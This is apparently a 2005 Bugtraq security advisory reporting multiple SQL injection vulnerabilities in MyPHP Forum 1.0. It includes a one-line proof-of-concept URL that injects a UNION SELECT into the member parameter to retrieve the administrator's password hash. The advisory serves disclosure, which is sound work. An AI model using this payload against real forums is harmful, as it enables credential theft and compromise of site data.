MyPHP Forum Multiple SQL Injection Vulnerabilities

Bugtraq ID:	12501
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Feb 09 2005 12:00AM
Updated:	Feb 09 2005 12:00AM
Credit:	Discovery of this vulnerability is credited to foster GHC <[email protected]>.
Vulnerable:	MyPHP Forum MyPHP Forum 1.0
Not Vulnerable:

MyPHP Forum Multiple SQL Injection Vulnerabilities

MyPHP Forum is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to the application failing to properly sanitize user-supplied input before using it in SQL queries.

Successful exploitation could result in a compromise of the application, disclosure or modification of data or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

MyPHP Forum Multiple SQL Injection Vulnerabilities

No exploit is required and the following proof of concept is available for retrieving a hash of the administrator password:

http://www.example.com/[MyPHPForum]/member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig, regdate, posts, password as yahoo FROM nb_member WHERE uid='1

MyPHP Forum Multiple SQL Injection Vulnerabilities

Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.

MyPHP Forum Multiple SQL Injection Vulnerabilities

References:

• MyPHP Forum Homepage (MyPHP Forum)
  
• GHC -> MyPHP Forum <- ADVISORY (foster GHC )